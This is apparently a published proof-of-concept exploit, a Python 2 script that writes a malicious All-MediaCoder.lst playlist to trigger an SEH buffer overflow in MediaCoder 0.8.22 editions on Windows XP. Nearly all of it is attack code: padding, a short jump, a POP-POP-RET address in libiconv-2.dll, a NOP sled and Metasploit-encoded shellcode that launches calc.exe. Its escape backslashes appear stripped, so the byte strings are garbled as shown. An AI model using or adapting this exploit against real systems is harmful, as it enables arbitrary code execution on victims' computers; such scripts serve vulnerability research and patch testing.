#!/usr/bin/python
import os
import sys
from struct import pack
from time import sleep
  
if os.name == "nt":
    os.system("cls")
    os.system("color 3f")
    
else:
    os.system("clear")


print """
 [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
 [+]Download All Product: http://www.mediacoderhq.com/editions.html
 [+]Vulnerable Product:!
 [+]Mediacoder 0.8.22.5525
 [+]Mediacoder Web Video Edition 0.8.22
 [+]Mediacoder Handsets Edition 0.8.22
 [+]Mediacoder iPhone Edition 0.8.22
 [+]MediaCoder-PSP Edition 0.8.22
 [+]Vulnerabilities File Format:lst
 [+]Date (found): 21.06.2013
 [+]Date (publish): 21.06.2013
 [+]Founder: metacom
 [+]RST 
 [+]Tested on: Windows Xp pro-sp3 English
 """

buffer = "http://" + "x41" * 845
nseh = "xEBx06xFFxFF"
seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
nops= "x90" * 80
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' -t c
shell= ("xbfx8exa0x35xacxdaxdaxd9x74x24xf4x5bx2bxc9xb1"
"x33x83xc3x04x31x7bx0ex03xf5xaexd7x59xf5x47x9e"
"xa2x05x98xc1x2bxe0xa9xd3x48x61x9bxe3x1bx27x10"
"x8fx4exd3xa3xfdx46xd4x04x4bxb1xdbx95x7dx7dxb7"
"x56x1fx01xc5x8axffx38x06xdfxfex7dx7ax10x52xd5"
"xf1x83x43x52x47x18x65xb4xccx20x1dxb1x12xd4x97"
"xb8x42x45xa3xf3x7axedxebx23x7bx22xe8x18x32x4f"
"xdbxebxc5x99x15x13xf4xe5xfax2ax39xe8x03x6axfd"
"x13x76x80xfexaex81x53x7dx75x07x46x25xfexbfxa2"
"xd4xd3x26x20xdax98x2dx6exfex1fxe1x04xfax94x04"
"xcbx8bxefx22xcfxd0xb4x4bx56xbcx1bx73x88x18xc3"
"xd1xc2x8ax10x63x89xc0xe7xe1xb7xadxe8xf9xb7x9d"
"x80xc8x3cx72xd6xd4x96x37x28x9fxbbx11xa1x46x2e"
"x20xacx78x84x66xc9xfax2dx16x2exe2x47x13x6axa4"
"xb4x69xe3x41xbbxdex04x40xd8x81x96x08x31x24x1f"
"xaax4d")
exploit = buffer + nseh + seh + nops + shell
 
try:
    rst= open("All-MediaCoder.lst",'w')
    rst.write(exploit)
    rst.close()
    raw_input("nExploit file created!n")
except:
    print "Error"